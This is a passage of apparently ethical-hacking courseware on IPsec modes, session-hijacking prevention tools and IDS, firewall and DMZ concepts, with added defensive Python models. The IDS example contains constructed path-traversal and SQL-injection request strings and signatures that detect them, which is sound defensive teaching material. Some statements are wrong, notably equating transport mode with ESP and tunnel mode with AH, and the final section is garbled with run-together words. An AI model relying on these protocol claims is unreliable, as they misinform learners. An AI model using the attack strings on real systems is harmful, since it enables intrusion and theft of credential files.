▪ Replay protection
At the IP layer, IPsec provides all the above-mentioned services, offering the protection of IP and/or upper-layer protocols such as TCP, ICMP, UDP, and Border Gateway Protocol (BGP).
Components of IPsec

▪ IPsec driver: Software that performs protocol-level functions required to encrypt and decrypt packets.
▪ Internet Key Exchange (IKE): A protocol that produces security keys for IPsec and other protocols.
▪ Internet Security Association and Key Management Protocol (ISAKMP): Software that allows two computers to communicate by encrypting the data exchanged between them.
▪ Oakley: A protocol that uses the Diffie-Hellman algorithm to create a master key and a key that is specific to each session in IPsec data transfer.
▪ IPsec Policy Agent: A service included in Windows OS that enforces IPsec policies for all the network communications initiated from that system.
The following are the steps involved in the IPsec process.

▪ A consumer sends a message to a service provider.
▪ The consumer's IPsec driver attempts to match the outgoing packet's address or the packet type against the IP filter.
▪ The IPsec driver notifies ISAKMP to initiate security negotiations with the service provider.
▪ The service provider's ISAKMP receives the security negotiation request.
▪ Both principals initiate a key exchange, establishing an ISAKMP Security Association (SA) and a shared secret key.
▪ Both principals discuss the security level for the information exchange, establishing both IPsec SAs and keys.
▪ The consumer's IPsec driver transfers packets to the appropriate connection type for transmission to the service provider.
▪ The provider receives the packets and transfers them to the IPsec driver.
▪ The provider's IPsec uses the inbound SA and key to check the digital signature and begin decryption.
▪ The provider's IPsec driver transfers decrypted packets to the OSI transport layer for further processing.
Modes of IPsec

The configuration of IPsec involves two different modes: the tunnel mode and transport mode. These modes are associated with the functions of two core protocols: the Encapsulation Security Payload (ESP) and Authentication Header (AH). The mode selection depends on the requirements and implementation of IPsec.

Transport Mode

In the transport mode (also ESP), IPsec encrypts only the payload of the IP packet, leaving the header untouched. It authenticates two connected computers and provides the option of encrypting data transfer. It is compatible with network address translation (NAT); therefore, it can be used to provide VPN services for networks utilizing NAT.
Figure 11.36: Transport mode encapsulation

Tunnel Mode
In the tunnel mode (also AH), IPsec encrypts both the payload and header. Hence, the tunnel mode has higher security than the transport mode. After receiving the data, the IPsec-compliant device performs decryption. The tunnel mode is used to create VPNs over the Internet for network-to-network communication (e.g., between routers and link sites), host-to-network communication (e.g., remote user access), and host-to-host communication (e.g., private chat). It is compatible with NAT and supports NAT traversal.

In the tunnel mode, the system encrypts entire IP packets (payload and IP header) and encapsulates the encrypted packets into a new IP packet with a new header. In this mode, ESP encrypts and optionally authenticates entire inner IP packets, whereas AH authenticates entire inner IP packets and selected fields of outer IP headers. The tunnel mode is usually useful between two gateways or between a host and gateway.
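To make the difference between the two modes concrete, here is a small Python model, added here and not part of the EC-Council courseware: it builds a simplified IP header, protects the payload (transport mode) or the whole inner packet plus its header (tunnel mode) with an ESP-style wrapper carrying a sequence number and an integrity check value, and enforces an anti-replay window on receipt. The 10-byte header layout, the shared keys and the HMAC-derived keystream are constructed stand-ins for illustration, not the real ESP wire format or a real cipher.

```python
"""Toy model of IPsec transport vs tunnel mode with an ESP-style
anti-replay window.  Constructed example: header layout, keys and the
HMAC-based keystream are illustrative stand-ins, not real ESP or AES."""
import hashlib
import hmac
import struct

# Assumed shared keys (in real IPsec they are negotiated by IKE).
ENC_KEY = b"constructed-encryption-key"
AUTH_KEY = b"constructed-authentication-key"
WINDOW = 64          # anti-replay window size (RFC 4303 minimum is 32)
ICV_LEN = 32         # HMAC-SHA256 integrity check value length
HDR_LEN = 10         # size of the simplified IP header below


def ip_header(src: str, dst: str, proto: int) -> bytes:
    """Simplified IP header: 4-byte src, 4-byte dst, protocol, pad byte."""
    addrs = b"".join(bytes(int(o) for o in a.split(".")) for a in (src, dst))
    return addrs + struct.pack("!BB", proto, 0)


def keystream(seq: int, length: int) -> bytes:
    """Per-packet keystream derived from the sequence number (toy PRF).
    The sequence number acts as the nonce, so it must never repeat."""
    out, block = b"", 0
    while len(out) < length:
        out += hmac.new(ENC_KEY, struct.pack("!IQ", seq, block), hashlib.sha256).digest()
        block += 1
    return out[:length]


def esp_wrap(seq: int, plaintext: bytes) -> bytes:
    """ESP-like body: seq || ciphertext || ICV over (seq || ciphertext)."""
    ct = bytes(a ^ b for a, b in zip(plaintext, keystream(seq, len(plaintext))))
    body = struct.pack("!I", seq) + ct
    return body + hmac.new(AUTH_KEY, body, hashlib.sha256).digest()


def esp_unwrap(packet: bytes):
    """Verify the ICV first (constant-time compare), then decrypt."""
    body, icv = packet[:-ICV_LEN], packet[-ICV_LEN:]
    if not hmac.compare_digest(icv, hmac.new(AUTH_KEY, body, hashlib.sha256).digest()):
        raise ValueError("integrity check failed")
    seq = struct.unpack("!I", body[:4])[0]
    ct = body[4:]
    return seq, bytes(a ^ b for a, b in zip(ct, keystream(seq, len(ct))))


def transport_mode(seq: int, src: str, dst: str, payload: bytes) -> bytes:
    """Transport mode: original header stays in clear, only payload protected."""
    return ip_header(src, dst, 50) + esp_wrap(seq, payload)


def tunnel_mode(seq: int, gw_src: str, gw_dst: str, src: str, dst: str, payload: bytes) -> bytes:
    """Tunnel mode: whole inner packet (header + payload) is protected and
    carried inside a new outer header between the two gateways."""
    inner = ip_header(src, dst, 6) + payload
    return ip_header(gw_src, gw_dst, 50) + esp_wrap(seq, inner)


class ReplayWindow:
    """Sliding anti-replay window: accept a sequence number only if it is
    newer than the highest seen, or inside the window and not yet seen."""

    def __init__(self, size: int = WINDOW):
        self.size, self.top, self.seen = size, 0, set()

    def accept(self, seq: int) -> bool:
        if seq > self.top:
            self.top = seq
            self.seen = {s for s in self.seen if s > self.top - self.size}
            self.seen.add(seq)
            return True
        if seq <= self.top - self.size or seq in self.seen:
            return False
        self.seen.add(seq)
        return True


def ipsec_receive(packet: bytes, window: ReplayWindow) -> bytes:
    """Receiver: strip outer header, verify ICV, check replay, return plaintext
    (for tunnel mode the plaintext is the complete inner packet)."""
    seq, plaintext = esp_unwrap(packet[HDR_LEN:])
    if not window.accept(seq):
        raise ValueError(f"replayed packet seq={seq}")
    return plaintext
```

The model mirrors what the text describes: in transport mode the first eight bytes (the addresses) are still readable on the wire, while in tunnel mode only the gateway addresses are visible and the inner header is recovered after decryption. Feeding the same packet twice through `ipsec_receive` raises, which is the replay rejection listed among IPsec's services.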
Figure: Tunnel mode encapsulation
IPsec Architecture

IPsec offers security services at the network layer. This provides the freedom to select the required security protocols as well as the algorithms used for services. To provide the requested services, the corresponding cryptographic keys can be employed, if required. Security services offered by IPsec include access control, data origin authentication, connectionless integrity, anti-replay, and confidentiality. To meet these objectives, IPsec uses two traffic security protocols, AH and ESP, as well as cryptographic key management protocols and procedures.

The structure of the IPsec architecture is as follows.

▪ Authentication Header (AH): It offers integrity and data origin authentication, with optional anti-replay features.
▪ Encapsulating Security Payload (ESP): It offers all the services offered by AH as well as confidentiality.
▪ IPsec Domain of Interpretation (DOI): It defines the payload formats, types of exchange, and naming conventions for security information such as cryptographic algorithms or security policies. IPsec DOI instantiates ISAKMP for use with IP when IP uses ISAKMP to negotiate security associations.
▪ Internet Security Association and Key Management Protocol (ISAKMP): It is a key protocol in the IPsec architecture that establishes the required security for various communications over the Internet, such as government, private, and commercial communications, by combining the security concepts of authentication, key management, and security associations.
▪ Policy: IPsec policies are useful in providing network security. They define when and how to secure data, as well as security methods to use at different levels in the network. One can configure IPsec policies to meet the security requirements of a system, domain, site, organizational unit, and so on.
Figure 11.38: IPsec architecture
IPsec Authentication and Confidentiality

IPsec uses two different security services for authentication and confidentiality.

▪ Authentication Header (AH): It is useful in providing connectionless integrity and data origin authentication for IP datagrams and anti-replay protection for the data payload and some portions of the IP header of each packet. However, it does not support data confidentiality (no encryption). A receiver can select the service to protect against replays, which is an optional service on establishing a security association (SA).
▪ Encapsulation Security Payload (ESP): In addition to the services (data origin authentication, connectionless integrity, and anti-replay service) provided by AH, the ESP protocol offers confidentiality. Unlike AH, ESP does not provide integrity and authentication for the entire IP packet in the transport mode. ESP can be applied alone, in conjunction with AH, or in a nested manner. It protects only the IP data payload in the default setting. In the tunnel mode, it protects both the payload and IP header.
Session Hijacking Prevention Tools

To prevent session hijacking, the security testing of web applications and the analysis of static code to identify vulnerabilities in web applications are required. Identifying vulnerabilities at an early stage helps in implementing security measures to protect against session hijacking attacks.
▪ CxSAST

Source: https://www.checkmarx.com

Checkmarx CxSAST is a unique source-code analysis solution that provides tools for identifying, tracking, and repairing technical and logical flaws in source code, such as security vulnerabilities, compliance issues, and business logic problems. CxSAST supports open-source analysis (CxOSA), enabling licensing and compliance management, vulnerability alerts, policy enforcement, and reporting. This tool supports a wide range of OS platforms, programming languages, and frameworks. Security professionals can use this tool to prevent various session hijacking attacks such as MITM attacks, session fixation attacks, and XSS attacks.
▪ Fiddler

Source: https://www.telerik.com

Fiddler is a web debugging proxy that logs all HTTP(S) traffic between a computer and the Internet. Fiddler is used for performing web-application security tests such as the decryption of HTTPS traffic and manipulation of requests using an MITM decryption technique. Security professionals can use Fiddler to test web applications by debugging the traffic from systems as well as manipulating and editing web sessions.

Figure 11.41: Screenshot of Fiddler
The following are some additional session hijacking prevention tools:

▪ Nessus (https://www.tenable.com)
▪ Netsparker (https://www.netsparker.com)
▪ Wapiti (http://wapiti.sourceforge.net)
▪ WebWatchBot (https://www.exclamationsoft.com)
Module Summary

In this module, we discussed concepts related to session hijacking, along with different types of session hijacking. We also discussed in detail application level and network level session hijacking attacks. Furthermore, this module presented various session hijacking tools. It also discussed how to detect, protect, and defend against session hijacking attacks, in addition to various session hijacking detection and prevention tools. This module ended with a detailed discussion on various countermeasures to be employed to prevent session hijacking attempts by threat actors.

In the next module, we will discuss in detail how attackers, as well as ethical hackers and pen-testers, evade network security components such as IDSs and firewalls to compromise network infrastructure.
Module 12: Evading IDS, Firewalls, and Honeypots
Module Objectives

The widespread use of the Internet throughout the business world has boosted network usage in general. Organizations adopt various network security measures such as firewalls, intrusion detection systems (IDS), intrusion prevention systems (IPS), and "honeypots" to protect their networks. Networks are the most preferred targets of hackers for compromising an organization's security, and attackers continue to find new ways to evade network security measures and attack these targets.

This module provides deep insights into various network security technologies, such as IDS, IPS, firewalls, and honeypots. It explains the operations of these components as well as the various techniques used by attackers to evade them. Further, it describes the countermeasures necessary to prevent such attacks.
At the end of this module, you will be able to:

▪ Describe IDS, IPS, firewall, and honeypot concepts
▪ Use different IDS, IPS, firewall, and honeypot solutions
▪ Explain different techniques to bypass IDS
▪ Explain various techniques to bypass firewalls
▪ Use tools to evade IDS/firewalls
▪ Explain different techniques to detect honeypots
▪ Adopt countermeasures against IDS/firewall evasion
Module Flow

IDS, IPS, Firewall, and Honeypot Concepts

Ethical hackers should have an idea about the function, role, placement, and design of firewalls, IDS, IPS, and honeypots to protect an organization's network by understanding how an attacker evades such security measures. This section provides an overview of these basic concepts.
Intrusion Detection System (IDS)

An intrusion detection system (IDS) is a software system or hardware device that inspects all inbound and outbound network traffic for suspicious activity. It is placed outside/inside the firewall to check for traffic originating from outside/inside the network. When placed inside, the IDS will be ideal if it is near a DMZ; however, the best practice is to use a layered defense by deploying one IDS in front of the firewall and another one behind the firewall in the network.

Before deploying the IDS, it is essential to analyze the network topology, understand how the traffic flows to and from the resources that an attacker can use to gain access to the network, and identify the critical components that will be possible targets of various attacks against the network. After the position of the IDS in the network is determined, the IDS must be configured to maximize its network protection effect.
Figure 12.1: Placement of IDS

How an IDS Works

Figure 12.2: Working of IDS
How an IDS Detects an Intrusion?

▪ Signature Recognition

Signature recognition, also known as misuse detection, tries to identify events that indicate misuse of a system or network resource.

... the number of signatures in the database could result in the dropping of certain packets. New virus attacks such as URSNIF and VIRLOCK have driven the need for multiple signatures for a single attack. Changing a single bit in some attack strings can invalidate a signature generated for that attack. Therefore, entirely new signatures are required to detect a similar attack. Despite the problems with signature-based IDS, such systems are popular, and they work well when configured correctly and monitored closely.
▪ Anomaly Detection

Anomaly detection, or "not-use detection," differs from signature recognition. Anomaly detection involves a database of anomalies. An anomaly is detected when an event occurs outside the tolerance threshold of normal traffic. Therefore, any deviation from regular use is an attack. Anomaly detection detects intrusions based on the fixed behavioral characteristics of the users and components in a computer system. Establishing a model of normal use is the most challenging step in creating an anomaly detector.

o In the traditional method of anomaly detection, essential data are kept for checking variations in network traffic. However, in reality, there is some unpredictability in network traffic, and there are too many statistical variations, thus making these models imprecise. Some events labeled as anomalies might only be irregularities in network usage.
o In this type of approach, the inability to construct a model thoroughly on a regular network is a concern. These models should be used to check specific networks.
▪ Protocol Anomaly Detection

Protocol anomaly detection depends on the anomalies specific to a protocol. It identifies particular flaws in vendors' deployment of the TCP/IP protocol. Protocols are designed according to RFC specifications, which dictate standard handshakes to permit universal communication. The protocol anomaly detector can identify new attacks. There are new attack methods and exploits that violate protocol standards.

Malicious anomaly signatures are becoming increasingly common. By contrast, the network protocol is well defined and is changing slowly. Therefore, the signature database should frequently be updated to detect attacks.

Protocol anomaly detectors are different from traditional IDS in terms of how they present alarms. The best way to present alarms is to explain which part of the state system is compromised. For this purpose, IDS operators must have thorough knowledge of protocol design.
General Indications of Intrusions

Intrusion attempts on networks, systems, or file systems can be identified by following some general indicators:
▪ File System Intrusions

By observing system files, the presence of an intrusion can be identified. System files record the activities of the system. Any modification or deletion of the file attributes or the file itself is a sign that the system has been a target of an attack:

o If you find new, unknown files/programs on your system, then there is a possibility that the system has been intruded into. The system can be compromised to the extent that it can, in turn, compromise other network systems.
o When an intruder gains access to a system, he or she tries to escalate privileges to gain administrative access. When the intruder obtains administrator privileges, he/she could change file permissions, for example, from read-only to write. Unexplained modifications in file size are also an indication of an attack. Make sure you analyze all your system files.
o The presence of rogue suid and sgid files on your Linux system that do not match your master list of suid and sgid files could indicate an attack.
o You can identify unfamiliar file names in directories, including executable files with strange extensions and double extensions.
o Missing files are also a sign of a probable intrusion/attack.
▪ Network Intrusions

Similarly, general indications of network intrusions include:

o A sudden increase in bandwidth consumption
o Repeated probes of the available services on your machines
o Connection requests from IPs other than those in the network range, which imply that an unauthenticated user (intruder) is attempting to connect to the network
o Repeated login attempts from remote hosts
o A sudden influx of log data, which could indicate attempts at DoS attacks, bandwidth consumption, and DDoS attacks
▪ System Intrusions

Similarly, general indications of system intrusions include:

o Sudden changes in logs such as short or incomplete logs
o Unusually slow system performance
o Missing logs or logs with incorrect permissions or ownership
o Modifications to system software and configuration files
o Unusual graphic displays or text messages
o Gaps in system accounting
o System crashes or reboots
o Unfamiliar processes
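One of the file-system indicators above, rogue suid/sgid files that do not match a known master list, can be checked mechanically. The Python script below is an added example, not part of the courseware; the baseline paths and the sample (path, mode) entries are constructed, and walk_modes() is the only part that touches a real file system.

```python
"""Added example: compare the set-id files on a host against an approved
baseline (the 'master list of suid and sgid files' in the text).
The baseline below is constructed for illustration."""
import os
import stat

# Constructed baseline: set-id binaries an administrator has already approved.
BASELINE = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su"}


def is_setid(mode: int) -> bool:
    """True if either the setuid or the setgid bit is set in a file mode."""
    return bool(mode & (stat.S_ISUID | stat.S_ISGID))


def find_setid(entries):
    """entries: iterable of (path, st_mode).  Returns the set of regular
    files that carry a set-id bit; set-gid directories are ignored because
    they only affect group inheritance, not privilege."""
    return {path for path, mode in entries if stat.S_ISREG(mode) and is_setid(mode)}


def walk_modes(root: str):
    """Real scan: yield (path, st_mode) for every file under root.
    lstat is used so symlinks are reported as links, not followed."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                yield path, os.lstat(path).st_mode
            except OSError:
                continue   # unreadable or vanished entry; skip, do not abort


def rogue_setid(entries, baseline=BASELINE):
    """Set-id files present now but absent from the baseline: investigate."""
    return sorted(find_setid(entries) - baseline)


def missing_from_baseline(entries, baseline=BASELINE):
    """Baseline entries no longer set-id (or no longer present): also a change
    worth recording, since it may mean a binary was replaced."""
    return sorted(baseline - find_setid(entries))


if __name__ == "__main__":
    # Typical use on a live system: python3 this_script.py /usr /bin /tmp
    import sys
    found = []
    for root in sys.argv[1:] or ["/usr"]:
        found.extend(walk_modes(root))
    for path in rogue_setid(found):
        print("ROGUE set-id file:", path)
    for path in missing_from_baseline(found):
        print("baseline entry no longer set-id:", path)
```

The baseline should be captured from a known-good build and stored off the host, since an intruder with administrator privileges (the escalation case described above) can edit a list kept locally.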
Types of Intrusion Detection Systems
There are two types of intrusion detection systems:

▪ Network-Based Intrusion Detection Systems

Network-based intrusion detection systems (NIDS) check every packet entering the network for the presence of anomalies and incorrect data. By limiting the firewall to drop large numbers of data packets, the NIDS checks every packet thoroughly. A NIDS captures and inspects all traffic. It generates alerts at the IP or application level based on the content. NIDS are more distributed than host-based IDS. The NIDS identifies the anomalies at the router and host levels. It audits the information contained in the data packets and logs the information of malicious packets; furthermore, it assigns a threat level to each risk after receiving the data packets. The threat level enables the security team to remain on alert. These mechanisms typically consist of a black box placed on the network in a promiscuous mode, listening for patterns indicative of an intrusion. It detects malicious activity such as DoS attacks, port scans, or even attempts to break into computers by monitoring network traffic.
Figure 12.3: Network-based IDS

▪ Host-Based Intrusion Detection Systems

Figure 12.4: Host-based IDS (HIDS)
Types of IDS Alerts
An IDS generates four types of alerts: True Positive, False Positive, False Negative, and True Negative.

▪ True Positive (Attack - Alert): A true positive is a condition that occurs when an event triggers an alarm and causes the IDS to react as if a real attack is in progress. The event may be an actual attack, in which case an attacker attempts to compromise the network, or it may be a drill, in which case security personnel use hacker tools to test a network segment.
▪ False Positive (No attack - Alert): A false positive occurs if an event triggers an alarm when no actual attack is in progress. It occurs when an IDS treats regular system activity as an attack. False positives tend to make users insensitive to alarms and weaken their reactions to actual intrusion events. While testing the configuration of an IDS, administrators use false positives to determine whether the IDS can distinguish between false positives and real attacks.
▪ False Negative (Attack - No Alert): A false negative is a condition that occurs when an IDS fails to react to an actual attack event. This condition is the most dangerous failure, as the purpose of an IDS is to detect and respond to attacks.
▪ True Negative (No attack - No Alert): An IDS does not raise an alarm when an attack has not taken place.
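The following Python example, added here and not from the courseware, ties the detection methods (signature recognition and anomaly detection) to the four alert types: it runs a signature-based detector and a simple anomaly-based detector over a few constructed HTTP access-log lines, then classifies every decision as a true positive, false positive, false negative or true negative against constructed ground-truth labels. The log lines, the signature patterns and the size-based model of "normal" traffic are assumptions, chosen so that one benign request hits an over-broad signature (a false positive) and one attack is caught only by the anomaly model.

```python
"""Added example: signature vs anomaly detection over constructed log
lines, scored as TP/FP/FN/TN.  Patterns and data are illustrative."""
import re
import statistics

# Constructed access-log lines with ground-truth labels (True = attack),
# as an analyst would assign them after investigation.
LOG = [
    ('10.0.0.5 "GET /index.html" 200 512', False),
    ('10.0.0.5 "GET /about.html" 200 2048', False),
    ('10.0.0.7 "GET /login" 200 900', False),
    ('10.0.0.9 "GET /search?q=../../etc/passwd" 403 120', True),
    ('10.0.0.9 "GET /search?q=%27%20OR%201%3D1--" 500 80', True),
    ('10.0.0.11 "POST /upload" 200 5242880', True),        # unusually large transfer
    ('10.0.0.5 "GET /contact.html" 200 1024', False),
    ('10.0.0.12 "GET /help?q=password reset" 200 700', False),  # benign hit on a keyword
]

# Signature recognition: fixed patterns for known misuse.  The "keyword"
# entry is deliberately over-broad to show how a false positive arises.
SIGNATURES = {
    "path_traversal": re.compile(r"\.\./"),
    "sqli_or_true": re.compile(r"(%27|').*(OR|or).*(1=1|1%3D1)"),
    "keyword": re.compile(r"password"),
}


def signature_detect(line: str) -> bool:
    """Alert if any known-attack pattern matches the line."""
    return any(p.search(line) for p in SIGNATURES.values())


def response_size(line: str) -> int:
    """Last field of the constructed log format is the response size."""
    return int(line.rsplit(" ", 1)[1])


def anomaly_detect(lines, threshold: float = 3.0):
    """Anomaly detection: learn 'normal' response size from the traffic itself
    (median and median absolute deviation, which resist outliers) and flag
    anything more than `threshold` deviations away from the median."""
    sizes = [response_size(l) for l in lines]
    med = statistics.median(sizes)
    mad = statistics.median(abs(s - med) for s in sizes) or 1
    return [abs(s - med) / mad > threshold for s in sizes]


def score(predictions, labels) -> dict:
    """Map each (alert?, attack?) pair onto the four IDS alert types."""
    counts = {"TP": 0, "FP": 0, "FN": 0, "TN": 0}
    for alerted, attack in zip(predictions, labels):
        if alerted:
            counts["TP" if attack else "FP"] += 1
        else:
            counts["FN" if attack else "TN"] += 1
    return counts


def evaluate() -> dict:
    """Score each detector alone and the two combined (alert if either fires)."""
    lines = [line for line, _ in LOG]
    labels = [attack for _, attack in LOG]
    sig = [signature_detect(line) for line in lines]
    ano = anomaly_detect(lines)
    combined = [s or a for s, a in zip(sig, ano)]
    return {
        "signature": score(sig, labels),
        "anomaly": score(ano, labels),
        "combined": score(combined, labels),
    }


if __name__ == "__main__":
    for name, counts in evaluate().items():
        print(f"{name:10s} {counts}")
```

Running it shows the trade-off the text describes: the signature detector misses the oversized upload (a false negative, since no signature exists for it) and fires on the harmless "password reset" search (a false positive), while the anomaly detector catches the upload but knows nothing about the traversal and injection strings. Combining the two removes the false negatives here but keeps the false positive, which is why over-broad signatures need tuning rather than simply adding more detectors.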
Intrusion Prevention System (IPS)

An intrusion prevention system (IPS) is also considered an active IDS, since it is capable of not only detecting intrusions but also preventing them.

▪ Block and filter malicious traffic
▪ Detect and eliminate threats quickly, as it is placed inline in the operational network
▪ Identify threats accurately without generating false positives
An IPS takes actions based on certain rules and policies configured into it. In other words, the IPS can identify, log, and prevent the occurrence of any intrusion or attack in the network. IPS can also be employed to detect critical issues in corporate security policies such as notorious insider threats, malicious network guests, etc.

Classification of IPS:

Like IDS, IPS are also classified into two types:

▪ Host-based IPS
▪ Network-based IPS
Advantages of IPS over IDS:

▪ Unlike IDS, IPS can block as well as drop illegal packets in the network
▪ IPS can be used to monitor activities occurring in a single organization
▪ IPS can prevent the occurrence of direct attacks in the network by controlling the amount of network traffic

Figure 12.5: Example of an IPS placement
Firewall

A firewall is a software- or hardware-based system located at the network gateway that protects the resources of a private network from unauthorized access by users on other networks. They are placed at the junction or gateway between two networks, usually a private network and a public network such as the Internet. Firewalls examine all the messages entering or leaving the intranet and block those that do not meet the specified security criteria. Firewalls may be concerned with the type of traffic or with the source or destination addresses and ports. They include a set of tools that monitor the flow of traffic between networks. A firewall placed at the network level and working closely with the router filters all the network packets to determine whether to forward them toward their destinations. Always install firewalls away from the rest of the network, so that none of the incoming requests can gain direct access to a private network resource. If appropriately configured, the firewall protects systems on one side of it from systems on the other side. A firewall is an intrusion detection mechanism that is designed by an organization's security policy. Its settings can change to make appropriate changes to its functionality.

Firewalls can be configured to restrict incoming traffic to POP and SMTP and to enable email access. Certain firewalls block specific email services to avoid spam.

A firewall can be configured to check inbound traffic at a "checkpoint," where a security audit is performed. It can also act as an active "phone tap" tool for identifying an intruder's attempt to dial into modems in a secured network. Firewall logs consist of logging information that notifies the administrator about all attempts to access various services.
The firewall verifies the incoming and outgoing traffic against its rules and acts as a router to move data between networks. The firewall allows or denies access requests made from one side of it to services on the other side. It identifies all the attempts to log in to the network for auditing. Unauthorized attempts can be identified by embedding an alarm that is triggered when an unauthorized user attempts to log in. Firewalls can filter packets based on the address and type of traffic. They recognize the source and destination addresses as well as port numbers during address filtering, and they identify the types of network traffic during protocol filtering. Firewalls can identify the state and attributes of data packets.

Figure 12.6: Example of Firewall
Firewall Architecture

The firewall architecture consists of the following elements:

▪ Bastion Host

The bastion host is designed for defending the network against attacks. It acts as a mediator between inside and outside networks. A bastion host is a computer system designed and configured to protect network resources from attacks. Traffic entering or leaving the network passes through the firewall. It has two interfaces:

o Public interface directly connected to the Internet
o Private interface connected to the intranet

Figure 12.7: Bastion Host Firewall
▪ Screened Subnet

A screened subnet (DMZ) is a protected network created with a two- or three-homed firewall behind a screening firewall, and it is a term that is commonly used to refer to the DMZ. When using a three-homed firewall, connect the first interface to the Internet, the second to the DMZ, and the third to the intranet. The DMZ responds to public requests and has no hosts accessed by the private network. Internet users cannot access the private zone.

The advantage of screening a subnet away from the intranet is that public requests can be responded to without allowing traffic into the intranet. A disadvantage of the three-homed firewall is that if it is compromised, both the DMZ and the intranet could also be compromised. A safer technique is to use multiple firewalls to separate the Internet from the DMZ, and then separate the DMZ from the intranet.

Figure 12.8: Screened Subnet Firewall
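As an added illustration of the packet-filtering behaviour described in the Firewall section (address, port and protocol filtering plus tracking the state of packets) and of the three-homed screened subnet just described, the Python model below is not code from the courseware or from any firewall vendor. It implements a three-zone firewall in miniature: zones for the Internet, the DMZ and the intranet, a first-match rule list that ends in a default deny, and a connection table so that replies to allowed connections pass while unsolicited non-SYN packets are dropped. The address ranges, rules and packets are constructed.

```python
"""Added example: a small stateful, zone-based packet filter modelling a
three-homed firewall (Internet / DMZ / intranet).  Zones, rules and
packets are constructed; this is not any product's rule syntax."""
import ipaddress
from dataclasses import dataclass

# Constructed zone ranges: the DMZ and intranet are specific prefixes,
# everything else is treated as the untrusted Internet.
ZONES = {
    "dmz": ipaddress.ip_network("192.0.2.0/24"),
    "intranet": ipaddress.ip_network("10.0.0.0/8"),
}


def zone_of(ip: str) -> str:
    addr = ipaddress.ip_address(ip)
    for name, net in ZONES.items():
        if addr in net:
            return name
    return "internet"


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str          # "tcp" or "udp"
    dport: int
    sport: int = 40000
    syn: bool = True    # True for a new connection attempt, False for later packets


# Rules: (from_zone, to_zone, proto, dport, action).  First match wins; the
# final catch-all is the default deny.  "*" / 0 act as wildcards.
RULES = [
    ("internet", "dmz", "tcp", 80, "allow"),      # public web service in the DMZ
    ("internet", "dmz", "tcp", 443, "allow"),
    ("intranet", "dmz", "tcp", 22, "allow"),      # admins manage DMZ hosts
    ("intranet", "internet", "tcp", 443, "allow"),
    ("dmz", "intranet", "tcp", 5432, "deny"),     # DMZ web hosts must not reach the DB
    ("*", "*", "*", 0, "deny"),
]


class Firewall:
    def __init__(self, rules=RULES):
        self.rules = rules
        self.conntrack = set()   # (src, dst, proto, dport, sport) of allowed connections
        self.log = []

    @staticmethod
    def _matches(rule, pkt: Packet, src_zone: str, dst_zone: str) -> bool:
        from_zone, to_zone, proto, dport, _ = rule
        return (from_zone in ("*", src_zone) and to_zone in ("*", dst_zone)
                and proto in ("*", pkt.proto) and dport in (0, pkt.dport))

    def filter(self, pkt: Packet) -> str:
        """Return 'allow' or 'deny' for one packet, updating state and log."""
        src_zone, dst_zone = zone_of(pkt.src), zone_of(pkt.dst)
        if not pkt.syn:
            # Stateful part: a reply is allowed only if it belongs to a
            # connection that was admitted by a rule earlier.
            reverse = (pkt.dst, pkt.src, pkt.proto, pkt.sport, pkt.dport)
            if reverse in self.conntrack:
                return "allow"
            self.log.append(f"DROP unsolicited {pkt.src}->{pkt.dst}:{pkt.dport}")
            return "deny"
        for rule in self.rules:
            if self._matches(rule, pkt, src_zone, dst_zone):
                action = rule[4]
                if action == "allow":
                    self.conntrack.add((pkt.src, pkt.dst, pkt.proto, pkt.dport, pkt.sport))
                else:
                    self.log.append(f"DENY {src_zone}->{dst_zone} "
                                    f"{pkt.src}->{pkt.dst}:{pkt.dport}/{pkt.proto}")
                return action
        return "deny"   # unreachable with the catch-all rule, kept as belt and braces
```

Two points in the model match the text: the explicit `dmz -> intranet 5432 deny` rule encodes the advice that DMZ web servers should not be able to reach database servers, and the default-deny catch-all means an Internet host gets no path into the intranet unless a rule says otherwise. Logging the denied attempts gives the "attempts to access various services" record the text says firewall logs should provide.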
▪ Multi-homed Firewall

A multi-homed firewall is a node with multiple NICs that connects to two or more networks. It connects each interface to separate network segments logically and physically. A multi-homed firewall helps in increasing the efficiency and reliability of an IP network. The multi-homed firewall has more than three interfaces that allow for further subdividing the systems based on the specific security objectives of the organization. However, the model that provides deeper protection is the back-to-back firewall.

Figure 12.9: Multi-homed Firewall
Demilitarized Zone (DMZ)

In computer networks, the demilitarized zone (DMZ) is an area that hosts computer(s) or a small sub-network placed as a neutral zone between a particular company's internal network and an untrusted external network to prevent outsider access to a company's private data. The DMZ serves as a buffer between the secure internal network and the insecure Internet, as it adds a layer of security to the corporate LAN, thus preventing direct access to other parts of the network.

A DMZ is created using a firewall with three or more network interfaces that are assigned specific roles, such as an internal trusted network, a DMZ network, or an external untrusted network (Internet). Any service such as email, web, or FTP that provides access to external users can be placed in the DMZ. However, web servers that communicate with database servers cannot reside in the DMZ, as they could give outside users direct access to sensitive information. There are many ways in which the DMZ can be configured according to specific network topologies and company requirements.
Figure: Demilitarized zone (corporate network)

Types of Firewalls
There are two types of firewalls.

▪ Hardware Firewalls

A hardware firewall is a dedicated firewall device placed on the perimeter of the network. It is an integral part of the network setup and is also built into broadband routers or used as a standalone product. A hardware firewall helps to protect systems on the local network and performs effectively with little or no configuration. It employs the technique of packet filtering. It reads the header of a packet to find out the source and destination addresses, and compares them with a set of predefined and/or user-created rules that determine whether it should forward or drop the packet. A hardware firewall functions on an individual system or a particular network connected using a single interface. Examples of hardware firewalls include Cisco ASA and FortiGate. Hardware firewalls protect the private local area network. However, hardware firewalls are expensive as well as difficult to implement and upgrade.

Advantages:

o Security: A hardware firewall with its operating system (OS) is considered to reduce security risks and increase the level of security controls.
o Speed: Hardware firewalls initiate faster responses and enable more traffic.
o Minimal interference: Since a hardware firewall is a separate network component, it enables better management and allows the firewall to shut down, move, or be reconfigured without much interference in the network.
Disadvantages:
- More expensive than a software firewall.
- Difficult to implement and configure.
- Consumes more space and involves cabling.
Figure 12.1: Hardware Firewall
Software Firewalls
A softwarefirewall is similarto a filter, It sits betweena regular applicationand the
networking components of the OS.It is more usefulfor individualhomeusers and itis
suitablefor mobileusers whoneeddigital security whenworking outsidethe corporate
network.Further, it is easyto install on an individual'sPC,notebook, or workgroup
server. It helps protectyour systemfromoutsideattemptsat unauthorizedaccess and
provides protectionagainsteveryday Trojans and email worms. It includesprivacy
controls, web filtering, andmore. A softwarefirewallimplants itselfi n thecriticalarea of
theapplication/network path.It analyzes thedataflowagainst the ruleset.
The configuration of softwarefirewall is simple compared to that of a hardware
